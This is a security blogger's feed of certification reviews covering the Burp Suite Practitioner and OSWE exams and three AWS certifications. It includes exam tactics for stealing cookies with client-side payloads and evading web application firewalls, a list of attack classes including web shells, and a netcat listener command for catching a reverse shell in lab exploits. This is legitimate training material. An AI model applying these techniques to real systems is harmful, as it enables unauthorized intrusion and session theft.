Normal view

There are new articles available, click to refresh the page.
Before yesterdayS7acktrac3

Mastering Burp Suite: A Journey to Certification and Beyond

28 October 2023 at 23:06

Mastering Burp Suite: A Journey to Certification and Beyond

Greetings, everyone! I’m back with the grandest of brooms, ready to sweep away three years’ worth of dust that’s gathered on this aging blog. Over this time, my life has seen significant changes, both personally and professionally. The most remarkable of these changes has been embracing the title of a girl-dad – an experience that has transformed my life in ways I never imagined. As outlandish as some of the rumors may be, I’m here to set the record straight by confirming that the answer to the top three questions people have been asking me is emphatically ‘NO’:   

  1. Did I vanish into a cosmic abyss?
  2. Did I unearth and capitalize on a zero-day exploit, catapulting me into the elite 1%?
  3. Did I amass a fortune in Bitcoin and bask in retirement on the pristine shores of the Cayman Islands?

The purpose of this post is threefold:

  1. To share my personal journey through the Burp Suite Practitioner Certification, offering insights into the challenges and victories I encountered along the way.
  2. To provide valuable resources and tips that were instrumental in my certification journey, aiding others in their quest to pass the exam on their first attempt.
  3. To inspire and encourage fellow cybersecurity enthusiasts to embark on their certification journeys, highlighting the value of accessible labs and the wealth of resources available from trusted authorities in the field.

If you’re already well-prepared, completed the labs, and are seeking last-minute exam tips, feel free to skip ahead.

Unwrapping the Burp Suite Practitioner Certification

The Burp Suite Certified Practitioner (BSCP) certification, presented by PortSwigger, the creators of Burp Suite, marks a significant milestone in one’s web security career. It demonstrates the ability to identify vulnerabilities, bypass defense mechanisms, and exploit them using Burp Suite. While some lab material delves into extreme depth, PortSwigger’s well-structured learning path and excellent course materials make most topics accessible and engaging. A detailed lab breakdown can be found in the appendix here.

Investing Wisely: Navigating the Cost of Certification

The BSCP certification costs just $99, which may surprise some. This affordability challenges our expectations, especially in a world accustomed to $1,500 courses and expiring lab subscriptions. It’s a psychological shift, and while it might seem cheap, remember that you’ll also need a Burp Pro license, mandatory for the exam. Currently priced at $449.

Juggling Parenthood and Certification Preparation

The path to certification requires unwavering consistency and willpower. I personally stopped and started my journey multiple times over two years. Acknowledging my lackluster focus, I decided to reset my lab progress in July and start from scratch. As of October 26, 2023, I’ve solved over 200 labs, covering Apprentice and Practitioner levels. The difference this time? I took notes diligently. A valuable lesson: embrace discipline and take notes alongside your hacking journey.

Exam readiness - check!

Cracking the Books: A Deep Dive into the Study Process

I embarked on my journey using Obsidian and Burp, with the ambitious goal of completing an entire topic per day (26 in total). My commitment was to ensure that I never went a day without at least completing some labs or reading material. The key to my success was not overlooking foundational topics. I’ve learned that reinforcing the basics keeps me receptive and offers fresh perspectives.

Decoding the Essentials: A Closer Look at Course Topics

Portswigger’s materials stands at the top tier when it comes to web application vulnerability resources. It’s free, which is a game-changer. No more scouring the internet and deploying vulnerable apps with no guidance. The labs are a gift, especially if you’ve experienced the frustration of unresolved vulnerabilities and endless PHP exceptions. While some topics may be challenging at first, the satisfaction of grasping something new is unmatched.

Navigating Your Web Application Security Certification Choices

When it comes to web application security certifications, choosing the right path can be a daunting task. The decision should be based on your existing knowledge, career goals, and the level of expertise you wish to achieve. Remember, there’s no one-size-fits-all choice in this journey.

OSWA (Offensive Security Web Application):

  • OSWA claims the top spot due to its foundational and accessible nature, making it an ideal starting point for beginners. This certification provides an essential understanding of web application security, laying a solid groundwork for more advanced certifications. It’s perfect for those new to the field and seeking to build a strong knowledge base.

BSCP (Burp Suite Certified Practitioner):

  • BSCP earns the second place in the ranking for its specific focus on Burp Suite, the most popular web vulnerability scanner and security tool. This certification is valuable for individuals looking to master Burp Suite and enhance their web security assessment skills. It’s a practical choice for those who wish to specialize in this tool and its applications.

eWPTX (eLearnSecurity Web Application Penetration Tester eXtreme):

  • eWPTX secures the third position, offering a comprehensive and in-depth exploration of web application penetration testing. It’s an excellent choice for web security professionals looking to elevate their expertise and gain advanced skills in this domain. eWPTX provides hands-on experience and practical scenarios, making it a valuable certification for those aiming to take their career to the next level.

OSWE (Offensive Security Web Expert):

  • OSWE occupies the fourth rank, signifying its advanced and specialized focus on web application security. This certification is tailored for professionals seeking mastery in advanced web security assessment techniques and defense mechanisms. It’s ideal for those who have already built a strong foundation in web application security and are prepared for the challenges of in-depth expertise in the field.

The Path to Success: Navigating the Exam Journey

To register for the exam, you must complete at least one Practitioner-level lab from each topic, five mystery labs, and one practice exam. Mystery labs challenge you to identify vulnerabilities without explicit objectives. During the exam, you’ll need to compromise two applications within a four-hour window, moving from an anonymous user to an administrative user, and eventually gaining Remote Code Execution (RCE) to retrieve a secret file. The logistics are straightforward, but be prepared to start the exam from a Windows machine, even though you can complete it on your Kali box. You can read the official instructions here.

Acing the Exam: Strategies for Passing on Your First Attempt

First and foremost, dismiss the notion that you have to fail on your first try. The sentiment of preparing to fail on the first attempt is pervasive but not necessary.

Understanding Exam Dynamics:

  • Mastery of the exam dynamics is crucial, as it involves understanding the rules for completing each application, guiding you through discrete steps.
  • This knowledge is a significant advantage, allowing you to isolate specific topics for different phases of the exam.
  • For instance, you’re unlikely to encounter SQL injection or command injection when attempting to gain initial access; instead, client-side attacks to access a user’s session are more common.
  • Credit to @botesjuan who I believe is the original creator of the commonly shared image below
    Exploit breakdown per exam phase

Master Client-Side Delivery With The Exploit Server:

  • The effective use of the exploit server is paramount to your success. Even if your highly experienced, the bare minimum requirements for the exam often lead to failure.
  • Relying solely on one Practitioner lab per topic doesn’t adequately prepare you for the exam’s mechanics.

Weaponize Your Client-Side Payloads

  • Avoid regarding your alert as the ultimate solution in the labs; it’s insufficient in the exam. Instead, understand in each instance how you can exfiltrate cookies through your collaborator or  exploit server.
  • In many labs, you’ll achieve this using an iFrame, but be prepared for unexpected challenges. For example, some vulnerable pages may have X-Frame options that block iFrames.

Complete All Practitioner Labs:

  • Completing all Practitioner-level labs is essential, primarily for the sake of familiarity. The exam follows a similar structure to the labs, making your experience invaluable.
  • With enough practice, you’ll develop an intuitive sense and a mental checklist of potential vulnerabilities to look for.

Utilize Common Obfuscation and Encoding Techniques:

  • While labs may not require you to bypass web application firewalls (WAFs), the exam certainly does. Don’t underestimate the importance of obfuscation and encoding techniques.
  • Falling short in this area during the exam can lead to pitfalls, so be well-prepared.

Compile Proof-of-Concept (POC) Code:

  • It’s a recipe for disaster to rely solely on grabbing solutions from the lab materials during the exam, especially when you have only 40 minutes per vulnerability.
  • Ensure you have POC code readily available for each potential vulnerability you may encounter.

Perform Targeted Scanning, Don’t Rely On It

  • While targeted scanning is a valuable skill, it’s unwise to solely depend on it to solve the exam. The ability to actively scan the webroot and resolve the exam isn’t guaranteed.
  • Consider learning targeted scanning as an additional tool in your toolkit; it may prove useful in certain scenarios.

Value PortSwigger’s Hints:

  • Don’t overlook the hints provided by PortSwigger themselves. These hints can provide critical guidance and insights, potentially making your exam experience smoother and more successful.

Rich Resources: Your Ultimate Toolkit

A big shout-out to the authors of the following content, which proved immensely valuable during my journey. If you aim to pass the exam on your first attempt, bookmark these resources and know them inside and out.

Unlocking Wisdom: Blogs for your Journey

  1. https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study
  2. https://github.com/DingyShark/BurpSuiteCertifiedPractitioner
  3. https://github.com/Zoltan3422/portswigger-guide
  4. https://micahvandeusen.com/burp-suite-certified-practitioner-exam-review/
  5. https://bscpcheatsheet.gitbook.io/exam/
  6. https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/
  7. https://sc.scomurr.com/http-request-smuggling-web-cache-poisoning/

YouTube Guides: Navigating the World of Burp Suite

  1. https://www.youtube.com/@RanaKhalil101/videos
  2. https://www.youtube.com/@intigriti/videos
  3. https://www.youtube.com/watch?v=yC0F05oggTE
  4. https://www.youtube.com/@z3nsh3ll

Burp Plugin Power: Enhancing Your Toolkit:

  1. DOM Invader
  2. Param Miner
  3. Hackvector
  4. Deserialization Scanner
  5. HTTP Request Smuggler

The Final Verdict on the Burp Suite Practitioner Certification

Through this incredible journey, I’ve ventured into unfamiliar territories while strengthening my knowledge in familiar ones. The accessible labs have proven invaluable, offering a wealth of resources to all, even those who might not be interested in certification.

I want to underscore that if I can persevere through this certification journey with a newborn by my side, anyone with the motivation, focus, and determination can do it too. This certification offers a path to expertise in web security, a field where knowledge is power. So, dive in, make use of the resources I’ve shared, and indulge in your favorite topics. The journey is challenging, but the destination is worth every effort. Until next time, stay inspired and stay secure.

Appendix

My Favorite Topics

  • Prototype Pollution
  • HTTP Request Smuggling
  • Race Conditions

Lab Breakdown

Topic Total Apprentice Labs Total Practitioner Labs Total Expert Labs
SQLi 2 16 0
XSS 9 15 6
CSRF 1 11 0
Clickjacking 3 2 0
DOM-Based 0 5 2
CORS 2 1 1
XXE 2 5 1
SSRF 2 3 2
Request Smuggling 0 15 7
Command Injection 1 4 0
SSTI 0 5 2
Path Traversal 1 5 0
Access Control 9 4 0
Authentication 3 9 2
WebSockets 1 2 0
Cache Poisoning 0 9 4
Deserialization 1 5 3
Info Disclosure 4 1 0
Business Logic 4 7 0
Host Header 2 4 1
OAuth 1 4 1
File Upload 2 4 1
JWT 2 4 2
Prototype Pollution 0 9 1
GraphQL 1 4 0
Race Conditions 1 4 1
NoSQL 2 2 0

The post Mastering Burp Suite: A Journey to Certification and Beyond appeared first on Certification Chronicles.

OSWE Review (AWAE Course)

1 November 2020 at 19:09

Introduction

Once again I am victorious! Being completely transparent, passing that exam was hard – there were periods that totally made me doubt myself. During these times all the blogs you’ve read about people failing multiple time begins to resonate with you. Thoughts such as “who the hell do I think I am to not experience the same” start to creep up. Many people assume since I have a number of certificates that maybe the process is somewhat trivial or that I’m some super smart genius. That is 100% false. It’s a grind, a fight and a constant mental battle. The only difference for me is I have been through so many battles that I can more easily block out the noise, not let it totally consume me and rely on previous successes for confidence. This still takes effort though.

Before we start, there is no way I can provide better information on how to pass the exam than what’s already publicly available. That’s all included in the bookmark section. If you don’t care about the journey feel free to skip to the exam & methodology sections. I never try to give the best because best is subjective, relative and in most aspects I’m still a student. I attempt to provide what I felt was missing from most blogs I read when attempting to study. The context – the thoughts, feelings, emotions and situational metadata most authors never include.  So let’s begin with that.

Mindset 💡

I never pursue certificates for job promotion, advancement or anything besides enhancing my personal knowledge. Therefore it’s never any pressure on me. Besides the kind that’s self injected. It’s all for the love of learning security and its related disciplines. So If you’re the type who brute forces exams and doesn’t really care about the knowledge gain you’re probably not going to like it here. You’ll get (some) technical details sure, but it won’t be an exam dump thanks-goodbye post. That’s not the point. There’s nothing wrong with trying to put yourself in a better position but you should be driven solely by passion. That behavior waters our field down – you’ll meet folks with certificates abc-xyz who can’t think or speak beyond basics. To each’s own.

Why Go After OSWE

What makes a man go after any certificate 🤣 it seemed like beautiful pain. I hope no one has forgotten that I obtained CISSP at the beginning of the year, Certified Cloud Practitioner, Certified Solutions Architect, and Security Specialty AWS certificates towards beginning of the summer. I didn’t plan on any of this I just identify areas where I’m weak and find the best certificates to try to bridge the gap. I couldn’t take it anymore in June, after aimlessly doing nothing for a whole week. I justified purchasing a new course as a birthday gift to myself 😂 how pitiful I know.

I don’t perform any exploit development, penetration testing or malware reversing for work (90% of this blog). I learn them for fun and to understand the more difficult domains of security. Work is mainly Application Security – so this was one of the rare times I found a certificate that actually aligned directly with what I do day-to-day. That’s not to say that those topics don’t contribute to me having a more intimate comprehensive understanding of security because they do.

I knew the course was mainly source-code review. I thought this was AWESOME since there’s not many white-box based courses vs.  1-million black-box counterparts. I figured because of this a large majority of folks would wash this course and certificate down the drain. Folks want to use their tools and get root👌 If you’re a security professional and you run from source-code I can’t take you serious. If you can only leverage tools written by others and not develop your own you’re going to severely limit yourself. That’s one thing, maybe more important for web application security professionals – the vulnerabilities occur in the source-code they just manifest themselves in the applications, the exploits that take advantage of the vulnerabilities need to be developed in some source language. The point is we all need to be comfortable and at-home at the source level. We’re more valuable to our teams, developers and the organizations we defend.

Signing Up

You need to register for the course well before you anticipate starting. The slots fill up pretty fast. The same goes for registering for the exam. I registered on June 29th and the first available lab date was July 11th which I accepted and anxiously awaited. I decided to do 90-days of lab time since I already did the other certificates I planned to slow roll this one and if possible, pass the exam by end of year.

The Lab

If you are not familiar with Offensive Security courses at the exact time your lab is set to begin you’ll receive an email with your VPN credentials, course PDF, and a link to download the videos that go alongside the PDF. Some people are religious about the order in which they prepare whether it’s video first, PDF first. Personally for me I watch the videos for the entire module once and then replicate using the PDF as reference, if needed. Since the videos tend to be more verbose.

Along with the materials, once connected to VPN you get your Control Panel to revert machines. Unique to this course, you’re provided with a WIKI. It contains the list of machines in your lab, their IP addresses and credentials. In addition to that you’re provided with skeleton code for most of the exploits throughout the different modules. Thanks offsec! I would recommend you write it all out by hand and never touch these.

I start the lab and 5 days later guess what? The course gets updated! I get an additional 30 days of lab time for free. Talk about positive vibes!

Prior To Upgrade

The PDF was 267 pages, the videos and included 6 modules.

After The Upgrade

The bulked-up PDF was now 412 pages, included the original 6 modules, 3 additional lab machines with more modern vulnerabilities and exploitation techniques, and  3 machines with no solution purely provided for exam preparation. Of the new 3 lab machines 2 were white-box and 1 was black-box. That’s slightly incredible to receive seemingly 50% more content essentially On the house. I welcomed it with open arms.

Throughout the lab you’ll become one with all sorts of SQLi’s – union-based, time-based, boolean-based, mysql flavor, postgres flavor. Authentication bypasses using session hijacking & session riding will become natural, XXE’s, SSTI’s, deserialization, file upload bypasses and others. You’ll find a variety of languages including Java, PHP, Node.js, Python, C# and Web Frameworks to analyze and get comfortable with. For the compiled languages you’ll learn techniques to recover the original source-code. They’ll drill the importance of database query logging and how to set it up with the many databases throughout the course.

The difference in this course is the perspective and mindset to which you approach finding the vulnerabilities. They’re all impossible to discover purely from a black-box perspective, you won’t be throwing a vulnerability scanner at any of these boxes to find anything, sqlmap will not work (not allowed in exam anyway)! Run nikto, gobuster (or any other kali tool) if you want but it’s useless. You need a healthy combination of brainwork, understanding sources to sinks, routes and controllers. Become comfortable understanding code flow and lots of it. Following the lab guide and videos there are still modules that take multiple days to grasp and over a week to replicate. It’s a marathon not a sprint.

Losing Steam and Yolo’ing It

I was super motivated initially (month 1) putting in like 3-4 hours weekdays and 8+ on weekends. Life happens and you naturally start to lose steam. That’s why I typically troll Reddit for Discord groups with others studying for same or similar certificates. Because you’re not always going to be motivated and having others locked-in keeps you accountable and in the game. There will always be folks to bounce ideas off of, rant and cry to. Probably the most special part is just having friend across the globe that love the same thing as you. Once you have enough friends it’ll be impossible to slack because you’ll have friends in all time zones during breakfast, lunch, dinner and while you sleep to exchange knowledge with. Greetz to all my boys in the Discord server mentioned below.

Towards the beginning of October (month 3) I found myself skipping the lab completely for 3-4 days at a time. It was easier to to say whatever. My original exam date was October 30th and I felt like this exam was consuming me way too much and I was in the lab for way too long. I developed my methodology discussed below, rescheduled the exam for a week earlier 10/24 at 10:00 EST.

I had completed the entire lab twice (excluding the 1 black-box machine from the updated materials) I honestly watched the videos 3 times and still didn’t really grasp how I would have been able to achieve such madness start to finish and wrote it off as not needed. The 2nd time through the lab I took detailed notes – what were the high level steps to achieve authentication bypasses, what did I exploit to get RCEs, what was the syntax of the commands I used, what did I screw up on or miss that I should be on the lookout for if I come across similar situation. Lots of times I make snarky comments reminding myself how much of an idiot I am. It helps make things stick.

2 Weeks Before Exam

During the last 2 weeks I decided to give the 3 boxes without solutions a shot. It was a fight (struggle) but I managed to get RCE on both maybe in like a week and a half. I can remember going an entire weekend stuck and making no progress on one. Those were hard but it’s a shift in your mindset. You gain this fake confidence in the lab since you can simply look at the PDF & videos and you say to yourself , “I knew that or I would have been able to figure that out”. With no solutions your are on your own and at the mercy of your own brain. Again, like the black-box from the lab the black-box with no solutions was a brain fu*k. I got the authentication bypass but didn’t want to waste my remaining time on a exam for source-code review worrying about wicked black-box exploits. Not sure why they included these – I guess it’s to supplement those who don’t have experience analyzing from black-box perspective since in white-box you tend to leverage both. You see an input field or parameter that looks suspicious, find the method in the source-code responsible for processing that input then follow it to see if it’s sanitized or used in an unsafe way. If those black-box boxes (say that a few times fast) don’t make you sweat – you’re much more 1337 than I am!

Enter The Exam

I have been working on my zin a bunch lately. I spend absolutely zero energy on events I can’t control (weather, politics, someone’s thoughts of me, etc). I spend majority of my energy on things I have full control of (thoughts, discipline, being thankful, positive outlook). Finally there’s things that I don’t control fully but have some control of (certification exams). For these I shift my goal not to passing but giving my absolute max, trying my best and if I come up short I still achieve my goal. This reduces negative emotions like anxiety and regret.

So it is the Friday evening before the exam and I’m pumped. I’m excited to have a chance to perform. I really only judge myself when I’m facing challenging situations. It’s when your back is against the wall that determines your resiliency not when things are rosy. I’m a little nervous for the unknown, the shock factor. My only hope was that when I gained access to the exam that it didn’t feel like I had been studying for a different certification.

Day1 – 04:30 a.m I get out the bed since my mind has been racing for a half hour already. I watched the lab videos of exercises I thought were relevant. Ensured my notes were organized once more and wrote myself some positive notes in size 50 font bolded. The time was dragging but I used it wisely. My fear at this point is that I’m going to get sleepy during the day since I woke up so early, but so be it.

Day1 – 09:45 a.m I sign into the proctoring software, verify my credentials, display my workspace, and share my screens. I can’t provide specific details here but after connecting to the exam VPN I was provided 2 web application and their source-code. The Control Panel provided details and instructions on how to access each, the point breakdown and what constituted successful compromise. The proctor has no audio, you’re able to communicate with them via chat and your webcam is on at all times. I had been through the exam guide and proctoring manual maybe 15 times before this moment. You definitely don’t want to have IT issues the day of your exam.

Box-1 Start

Day1 – 10:00 a.mI’m off to the races. I went to the homepage of the first application to see what type of application it was then directly to the source-code. My brain is firing on all cylinders but there’s a LOT of code. Connect the dots. I got the authentication bypass at 18:53. At this point I’m thinking, “Damn I might fail this based off running out of time”.

Box-1 Authentication Bypass Complete (8hours 53 Minutes)

Did I mention I had PRK eye surgery a week before the exam? It’s like the precursor to LASIK but more stable and permanent. This is significant since folks typically want to know how often you took breaks. I was taking medicated eye drops every 4 hours, rewetting drops every hour, and every half hour I’d have to look away for at least a minute to focus on objects far away so I didn’t hurt the recovery of my eyes. I took one break of 30 minutes to eat in that time to get the first authentication bypass.

Day1 – 10:00p.m Things are hazy and waking up so early is beating me up right now. I know exactly what I have to do and I’m trying but it just won’t work. I’m making stupid scripting mistakes and wasting time on silly things being tired. I take a small break and promise myself I will go to sleep if I can get the RCE.

Day2 – 12:00a.m – I get the RCE and fulfill my promise. I feel okay now since I think I started with the tougher application and it took me around 14 hours start to finish. Off to sleep.

Box-1 RCE Complete (14 hour 15 minutes)
Box-2 Start

Day2 – 04:00a.m – What is up with me and 4 am but anyway that 4 hours felt marvelous and I felt like a tiger waking up! Very motivated. I put on the tea kettle to make myself some ginger tea, notify the proctor I’m back sit back down and lock back in.

Box-2 Authentication Bypass Complete (29 hours 53 minutes)

Day2 – 2:23p.m – I noticed the authentication bypass for this one in less than a half hour. Noticing it and pwning it are totally distinct things. I got the authentication bypass at 14:23. Yes. Imagine knowing what to do and it taking 9-10 hours. The good thing about the second box was I discovered the RCE while doing reconnaissance for the authentication bypass.

Box-2 RCE Complete (33 hours)

Day2 – 05:00p.m – RCE done! Although I have all the points now I also have a very important upcoming week at work and although I could wait until tomorrow (Monday) after work to write the report my exam time expires at 10am Monday. I take a break, eat dinner and start to write the report.

Writing The Report

Day2 – 7:00p.m – I had been taking screenshots throughout but I noticed how much I didn’t grab when I started to go through the sections of Offensive Security’s exam template. TRUST ME .. TRUST ME you do not want to get lazy on the report after you’ve done the exam because they will fail you without hesitation! There are plenty of horror stories. Myself being a former penetration tester and have gone through a couple Offensive Security certificates before I understand the level of granularity they expect you to provide.

Along with the proofs and screenshots you should include your methodology to achieve compromise along with your attack code. I provided everything, what I was thinking, vulnerable methods, pitfalls, and all the other (relevant) things firing off in your brain during a 48 exam.

Day3 – 12:00a.m – I proofread the report with glossy eyes 4 times, completed the process of uploading the exam reports. After I got the confirmation email I went to bed.

I had to wait an entire 5 days from Sunday night -> Friday to receive my results that I had achieved the OSWE certification 👏🏽

Exam Methodology

Everything I’m about to mention is taught and reiterated throughout the course. What’s the point? During the exam you’ll need to absorb and internalize tons of new information. A methodology is a general approach that you can refer to when you hit a snag.

If you don’t know how to debug you are dead. You cannot pass without understanding how to debug properly. In interpreted languages adding print statements. In compiled languages actually stepping over/in methods examining objects, properties and values. Leverage all the techniques taught throughout the course.

General

  • Examine unauthenticated areas of the source-code first
  • Leverage Visual Studio Code Remote SSH Extension
    • Understand the launch_json files in Visual Studio Code
  • Examine the routes to see all the endpoints. Understand the authorization applied to each
  • Review the controllers to understand how user input is handled by the application
  • If possible, always enable database query logging
  • DnsSpy to decompile .NET, JDGui for Java
  • After checking unauthenticated areas, focus on areas of the application that are likely to receive less attention
  • Investigate how sanitization of user input is performed. Is it done using a trusted, opensource library, or is a custom solution in place
  • When auditing realize which code you can reach regardless of conditionals, loop

Potential Authentication Bypass Techniques

  • SQLi
    • Can we create a user account
    • Can we leak hashed passwords, reset tokens an other information to aid in authentication bypass
  • Broken Authentication
    • Does authentication depend on private information that we can leak from DB using above
  • Regular – Time Based – Boolean Based (examples and templates for each)
  • PHP Type Juggling
  • Reading Arbitrary Files w/ XXE
  • XSS -> CSRF (Session Hijacking or Session Riding)

Potential Remote Command/Code Execution

  • Code Injection (Eval – Node.js)
  • Deserialization Bugs (Java .Net)
  • SSTI
  • Unrestricted File Upload

Hail Mary

  • User Defined Functions
  • 3rd Party Frameworks & Libraries
  • APIs
  • Client Side Attacks
  • Reversing Authentication
  • Brute Forcing Tokens
  • JSP Web Shells

Useful Bookmarks

All the blogs that I used to study. Shoutout to all the authors! Thank you.

Discord Server – https://discord.gg/EDsJkzz8tG

AWAE Hindsight

  • Offensive Security provides you with everything you need to pass the exam but you will also learn new things during the exam
  • I didn’t feel the pain folks were experiencing about latency. I did not touch their Kali instance
  • Be ready to be rattled. Things aren’t in the regular places, named differently, paths are different. During the exam do not underestimate how much this can freak you out. Basic Terminal/Powershell System Administration knowledge is your friend – grep, find, writing regular expressions and locating processes
  • Writing the POCs takes the most time since you need to script the entire exploit in one shot. Even with a developer background this took the most time. If Python is your language of choice be sure to know requests inside & out and in particular the session object!
  • Setup local or remote debugging for each lab machine and script the entire exploitation in one shot. This means in one terminal nc -nvlp <port> and in another python main.py 192.168.1.1  and you receive a shell
  • Go through all the modules and where Offensive Security says, “after some time we zeroed in on this class” actually go through the entire result set and try to analyze it as if you didn’t know which class contained the vulnerability. In the course it’s easy to say, “Oh they only had 40 results I would been able to filter through those until it’s time to do that”

Conclusion

As long as I’m more knowledgeable than I was prior to starting the course I had a good time and positive experience. No course is perfect so I don’t knit-pick. Some things exceeded my expectation some didn’t. I would recommend the course since you can’t find any competing courses with the same focus. Thank you Offensive Security.

What’s Next

  • Windows Kernel Programming by the awesome Pavel Yosifovich. I purchased this and really liked it but got caught up. I’m going to finish it this time!

 

  • SANs 642 London December 2020 😛 Shoutout to my boss! He kept a SANs voucher for me on ice which I graciously used the day after submitting my OSWE report #whatbreak
  • I am waiting until the new Offensive Security Exploit Development course comes out early 2021. I’m more interested in that than the PEN-300 they just dropped.

 

The post OSWE Review (AWAE Course) appeared first on Certification Chronicles.

AWS Certification Trifecta

28 June 2020 at 11:20

 

 

When the dust settled here’s what I was left with 😛

Date: Monday 05/04/2020 – 1800 hrs
Thoughts: “You should be embarrassed at how severely deficient you are in practical cloud knowledge.”

Background

This is exactly how all my journeys begin (inside my head) typically being judgmental and unfairly harsh on myself. That evening I started to research the cloud market share of Amazon, Azure and Google. It confirmed what I suspected with AWS leading (~34%) Azure having roughly half of AWS (~17%), Google (~6%) and the “others” accounting for the rest. Note: Although Azure owns half of AWS in market share percentage, their annual growth is double that (62%) of AWS (33%). I would start with AWS.

Now where do I begin? I reviewed their site listing all the certifications and proposed paths to achieve. Obviously the infosec in my veins wanted to go directly for the AWS Security Specialty but I decided not do that. Why? Figured I would be cheating myself. I would start at the foundational level and progressively work towards the Security Specialty. To appreciate the view so-to-speak. Security Specialty would be my end goal.

I fumbled my way through deploying AWS workloads previously. I used EC2 before (didn’t know what it stood for or anything beyond that – a VM in the cloud was the depth of my understanding), S3 was cloud storage (that I constantly read about being misconfigured leading to data exposure).

As always, there’s absolutely zero pressure on me. Only the pressure of myself 😅 which is probably magnitudes worse and more intense than what anyone from the outside could inflict on me.


AWS Certified Cloud Practitioner CLF-C01

The next day I began researching Cloud Practicioner. This involves a ton of sophisticated research better known as Google 🤣 in addition to, trolling all related Reddit threads that I can find. This is how I narrow down what are the best materials to prepare and what to avoid. 99% of my questions have already been answered.

After the scavenger hunt I felt like I could probably pass this one without doing any studying at all. Sometime I have to get outside of my own head. Not sure why I have all the confidence but it’s there (for no reason  in this case) and sometimes it burns me (keep reading).

I sped through the Linux Academy Practitioner course in 3 days. It was mostly review and everything you would expect for a foundational course. Some of the topics:

    • What is the cloud & what they’re made of
    • IAM Users, Groups, Roles
    • VPCs
    • EC2
    • S3
    • Cloudfront & DNS
    • AWS Billing

Date: Monday 05/09/2020 – 0800 hrs

From initial thought, it’s 5 days later. Exam scheduled for 1800 hrs I’m excited but nervous, unsure what to expect. The course prepared me well and the exam felt easy. I knew by the last question I had definitely gotten enough points to pass. I click next on the last question to end exam. AWS in a horrible play forces you to answer a survey before providing you the result.

I PASSED! You have to wait for a day or two to get the official notice that has a numeric score.


AWS Certified Solutions Architect – Associate SAA-C01

I clapped for myself but didn’t feel like I had done much. Practitioner is labeled foundational for a reason. Now it’s time to aim for a bigger target. Solutions Architect wouldn’t be easy it would take a whole heap of studying to clear it. I followed a similar approach going through the Linux Academy Solutions Architect Associate course.

Funny how the brain works because although Practitioner was easy it still gave me a chip on my shoulder going into this. Pick a post on Solutions Architect Associate and you’ll hear the pain, how tough it was, how it was most challenging cert of folks lives. I know from CISSP not to listen to this. I’m not sure if folks don’t fully prepare or just feel better about themselves exaggerating the complexity after passing to continue the horror stories. Maybe impose some of the fear they had onto others who are coming behind them?  One thing about me, I get tired of studying for the same thing quick. There’s no way I would/could ever study for a cert for 5 months, 6 months, a year. Yeah-Freaking-Right.

The cool thing about AWS is that all the certifications are built upon the foundation. No matter which one  you go for it’s pretty much going deeper into the usage, capabilities of appropriate related services. I chose to sit for C01 although C02 was recently released I wasn’t going to risk being a live beta tester. I was concerned with the newer exams’ stability. As I write this C01 is officially dead in 3 days, July 1 2020 then all candidates will only have C02 good luck 🤣.

Date: Monday 05/014/2020 – 0800 hrs

5 days later after Practitioner (10 days total elapsed time from initial thought)

Okay I told you to keep reading 😂 I wish somebody would have stopped me. Since no one did the universe had to step in. In a cocky rage I take the exam after studying for only 5 days. Clicking through the survey I was heartbroken I had FAILED and I really deserved it. Who the hell did I think I was?

This is typically the time where you punch yourself and call yourself stupid. This hurt me more than it should have. I was pissed at myself. For not taking enough time to study, sure but the real hurt was because I couldn’t will myself to pass even with minimal studying. LMAO. (WTF Bro) Here’s what I woke up to the next day.

What 🤬 I only missed it by 20 points FML that made it worse.

You BIG Dummy!

Okay. I picked myself up and scheduled my retake for exactly 2 weeks out. After seeing that score I felt like if I could have retook it the next day I would have passed (again idk why, maybe that’s my way of dealing with failure, going even further balls to the wall 🤣) The mandatory 2 weeks felt like forever. I was studying at least 6 hrs a day on weekdays and sun-up to sun-down on weekends. Nothing or anyone could get any of my time. Besides this, the only other cert I ever had to retake was CRTP. It humbled and fueled me more.

I figured I needed to learn from an alternative source – I went to AcloudGuru’s course which I felt was really lite compared to Linux Academy. The last week I found this Udemy course. Stephane Maarek the instructor is the 🐐 Thank You sir! In hindsight I could have used this alone to pass the exam. It was that good. Here’s another review I found useful while preparing for my retake. Thank you Jayendra 💗

Date: Monday 05/28/2020 – 0800 hrs

14 days later after 1st Solutions Architect Associate attempt (24 days total elapsed time from initial thought)

I felt pretty confident this time (it’s justified this time). I realized how much I didn’t know  after this go around and how I maybe didn’t deserve the 700 the first time. I definitely was gunning for a perfect exam 😂. And I forgot to mention when you pass any AWS cert you get 50% off the next, so me failing the first one totally screwed up the financial efficiency I had to pay full price for this one. I PASSED. But did you get the perfect score 🤔 I definitely didn’t feel like there was ANY question I didn’t know the answer for. Here’s what I woke up to the next day

God knew not to give me a perfect score! Probably would have done more harm than good 😂 I was very proud of my score. I ASSAULTED/CRUSHED/ANNIHILATED THAT EXAM. TEACH YOU WHO YOU DEALING WITH 👊🏾 This is how I was feeling at the moment!

via GIPHY


Amazon AWS Certified Security SCS C01

I needed a break so I took a weekend off. Come Monday I was right back in the grind 💪🏾 I wished Stephane had created a course for the Security Specialty but he didn’t 😞 I went through Linux Academy course. After that, I brought John Bonso course at tutorialsdojo.

Listen. LISTEN. 🗣🔊 LISTEN  The length of these questions are in-freaking-sane. I remember one night losing track of time, completing only like 20 questions but over 2 hours had elapsed. It quickly negged me out. I love reading but my gosh these were monsters and the scenarios were ridiculous. I was like bump this I’m not sure I really even want this thing that bad.

via GIPHY

I took like 2 weeks off and came back to it! I wondered if I forgot all the things I had learned from the course, I hadn’t. Mentally I needed to prepare myself for those questions. Ultimately it’s discipline, will, and patience. Eliminated all distractions once again – nobody can get a hold of me and every ounce of free time is devoted to the task at hand. After completing all the questions there I used my free AWS practice exam. It stinks because they don’t even give you the answers. Like WTF is that about? I found any practice questions I could on on the internet for 3 days straight.

Date: Monday 06/26/2020 – 0800 hrs

Now my birthday is 7/8 so I was going to schedule the exam for 7/7 to wake up to the pass on my birthday. I quickly decided not to do that in case i failed 🤣🤞🏾 so I scheduled it 4 days out on Monday 6/29.

Told you guys I don’t like studying for long. Later on that day at about 1400 hrs I don’t know why but I went back to the exam scheduling and saw they had a exam slot for the same day at 1545 hrs 😲 Forget it! I rescheduled it and confirmed it. As soon as I did that I thought, “why the hell did you do that”?

If it was one thing I knew it was this. I was going to be even more disappointed than I was when I came up short for Solutions Architect for the first time. I imagine it would have been something like this after failing.

via GIPHY

